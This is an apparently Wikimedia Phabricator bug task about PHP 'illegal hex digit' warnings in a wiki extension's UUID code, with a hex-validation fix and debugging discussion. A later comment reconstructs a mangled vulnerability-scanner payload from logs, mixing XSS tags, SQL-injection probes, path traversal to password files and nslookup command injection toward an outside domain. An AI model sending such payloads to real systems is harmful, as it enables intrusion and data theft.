
Invalid argument: Type H: illegal hex digit in Model/UUID
Closed, ResolvedPublic

Description

Spotted in production:

1 Warning: Invalid argument: Type H: illegal hex digit y in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit t in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit r in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit p in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit l in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit / in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit g in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412

Details

Related Gerrit Patches:
mediawiki/extensions/Flow (master): Validate input as hex string

Event Timeline

demon created this task.Mar 5 2015, 3:33 PM
demon raised the priority of this task from to Needs Triage.
demon updated the task description.
demon added a subscriber: demon.
Restricted Application added a subscriber: Aklapper. Mar 5 2015, 3:33 PM

I wonder if there is any way we can get stack traces output with warnings; without them I'm rather unsure what exactly happened here.

We should see if these can be caught by a user-defined error handler.

EBernhardson triaged this task as Medium priority.Mar 5 2015, 6:49 PM

Change 194566 had a related patch set uploaded (by EBernhardson):
Validate input as hex string

https://gerrit.wikimedia.org/r/194566

The submitted patch might solve this problem (at least you can trigger it through that code path), but I'm not 100% sure this was the same source without a stack trace.

Change 194566 merged by jenkins-bot:
Validate input as hex string

https://gerrit.wikimedia.org/r/194566

Mattflaschen-WMF closed this task as Resolved.Mar 10 2015, 12:34 AM
Mattflaschen-WMF assigned this task to EBernhardson.
Mattflaschen-WMF set Security to None.

Now that's merged, let's close and re-open if it comes up again.
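The two things discussed above, validating the input as a hex string before it reaches pack('H*'), and getting a stack trace out of a warning via a user-defined error handler, as an added example. This is not Flow's code or the merged patch; the 22-digit length (11 bytes, matching Flow's 88-bit UUIDs) and the function names are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Added example, not code from the Flow extension. Assumed UUID width: 22 hex
// digits (11 bytes). Adjust to the real constant in your code base.
const UUID_HEX_LEN = 22;

/**
 * Convert a hex UUID to its binary form. Anything that is not exactly
 * UUID_HEX_LEN hex digits is rejected up front, so pack() never sees a
 * character that would trigger "Type H: illegal hex digit".
 * Returns null for invalid input instead of emitting a warning.
 */
function hexUuidToBinary(string $hex): ?string {
    if (strlen($hex) !== UUID_HEX_LEN || !ctype_xdigit($hex)) {
        return null;
    }
    return pack('H*', $hex);
}

/**
 * Promote PHP warnings to ErrorException. The exception records the call
 * stack at the point the warning was raised, which is what the plain
 * log line lacks. Other error levels fall through to PHP's default handler.
 */
function installWarningHandler(): void {
    set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline): bool {
        if (!($errno & (E_WARNING | E_USER_WARNING))) {
            return false;
        }
        throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
    });
}

installWarningHandler();

// Constructed inputs: one valid UUID, one wrong-length non-hex value of the
// kind a scanner submits as a post id, and one right-length value with a
// single illegal digit.
$inputs = [
    '0123456789abcdef012345',
    'not-a-post-id',
    '0123456789abcdef01234g',
];

foreach ($inputs as $in) {
    $bin = hexUuidToBinary($in);
    printf("%-26s -> %s\n", var_export($in, true), $bin === null ? 'rejected' : bin2hex($bin));
}

// Unvalidated path for comparison: pack() raises the production warning, the
// handler turns it into an exception, and the trace shows the code path.
// (Throwable is caught so the branch also runs on versions that throw
// ValueError directly.)
try {
    pack('H*', 'zz');
} catch (Throwable $e) {
    echo "caught: ", $e->getMessage(), "\n", $e->getTraceAsString(), "\n";
}
```

The validation is the fix that closes the warning; the error handler is the diagnostic that answers "where did this come from" the next time a warning appears without a trace. Keep the handler narrow (warnings only) in production, since converting notices and deprecations to exceptions changes behaviour far outside the code you are debugging.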

Restricted Application added a project: Collaboration-Team-Triage. Jun 12 2015, 6:35 PM
Zoglun added a subscriber: Zoglun.Feb 25 2019, 12:14 AM

Hi,

I'm NOT reporting a bug, but I would like to share some info that we found. It seems that the filter works as expected. The extension might need some improvement to handle even more advanced XSS attacks.

Using MW 1.31.1.

We found some error message like:
PHP Warning: pack(): Type H: illegal hex digit I in /w/extensions/FlowThread/includes/UUID.php on line 52

By combining them we got the following (the " mark was converted):

"+rspons.writ(*)+"rspons.writ(*)'+rspons.writ(*)+'"+rspons.writ(*)+"VliPostIVliPostIVliPostIYPrgUjNRiX$(nslookupns..\.-...\.xss.m)&nslookupns..\.-...\.xss.m&'\"`&nslookupns..\.-...\.xss.m&`'&nslookupns..\.-...\.xss.m&'\"`&nslookupns..\.-...\.xss.m&`'VliPostIVliPostI:.-...@xss.m-OR+--=+++VliPostI-'OR+--=+++or'JhNQqlT'='i(now()=syst(),slp(),)/*'XOR(i(now()=syst(),slp(),))OR'"XOR(i(now()=syst(),slp(),))OR"*/jswY');sltpg_slp();--'"\'\");VliPostIVliPostI-OR+--=+++--VliPostI-'OR+--=+++or'rzUphH'='-"OR+--=+++---"OR*>(++-)--witorly'::'--${+}VliPostIVliPostIhttp://som-inxistnt-wsit.u/som_inxistnt_il_with_long_nm?.jpg../../../../../../../../../../t/psswVliPostIhttp://tstsp.vulnw.om/t/it.txt?.jpg.\\./.\\./.\\./.\\./.\\./.\\./t/psswHttp://tstsp.vulnw.om/t/it.txt/t/psswhttp://tstsp.vulnw.om/t/it.txt?.jpg../..//../..//../..//../..//../..//../..//../..//../..//t/psswQmiZQVJoVliPostI&n=v../../../../../../../../../../winows/win.ini/.\\./.\\./.\\./.\\./.\\./.\\./winows/win.iniVliPostIW-IN\w.xmlVliPostIVliPostI..%..%..%..%..%..%..%..%..%..%t%pssw%.jpg/t/psswhttp://tstsp.vulnw.om/t/xss.html?%.jpg';print(m(untix_wvs_surity_tst));$='%t%psswVliPostI';print(m(untix_wvs_surity_tst));$='il:///t/pssw";print(m(untix_wvs_surity_tst));$="http://hitjzyMzr.xss.m/pi.php/.${@print(m(untix_wvs_surity_tst))}\../../../../../../../../../../winows/win.iniVliPostIVliPostIVliPostIVliPostIVliPostI/.\\./.\\./.\\./.\\./.\\./.\\./winows/win.ini../..//../..//../..//../..//../..//../..//../..//../..//winows/win.ini../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././winows/win.ini)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))VliPostIVliPostI'"//www.vulnw.omVliPostI/\www.vulnw.omVliPostI���������%%/www.vulnw.om''""VliPostIVliPostI'"VliPostI'"VliPostIVliPostI'"()&%<x><SRiPt>k()</SRiPt>VliPostI{{*}}ux���z���z���xuVliPostI"sTYL='u:xpr/**/SSion(k())'="VliPostI<sript>k()</sript>VliPostI<SRiPt>k()</SRiPt>VliPostI<isinxtyp=imgsr=onrror=k()>VliPostI<img/sr=">"onrror=lrt()>%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%VliPostI<inpututoousonous=k()>VliPostI<img<!---->sr=xonrror=lrt();//><!---->VliPostI<%ontntitlonrsiz=k()>VliPostI<wVgx=>VliPostI<imgsR='http://ttkr-/log.php?VliPostI'"()&%<x><SRiPt>k()</SRiPt>ux���z���z���xu{{*}}u���s���s��s��uux���z���z���xuVliPostI"onmousovr=k()"VliPostI<SRiPt>k()</SRiPt>VliPostI<SRiPt>k()</SRiPt>VliPostI<vio><souronrror="jvsript:k()">VliPostI<svg	���������onlo=k();>VliPostI<imgsr=xyzOnrRor=k()>VliPostI<img/sr=">"onrror=lrt()>VliPostI\uSRiPt\k()\u/sripT\uVliPostI<inpututoousonous=k()><Hr=http://www.vulnw.om></>VliPostI}oy{u:xpr/**/SSion(k())}VliPostI<iRmsR=.om></IRm>VliPostIVliPostIVliPostIVliPostI

@Zoglun Feel free to create a new task for your new bugs, that old bug has resolved afaik.

mmodell changed the subtype of this task from "Task" to "Production Error".Aug 28 2019, 11:12 PM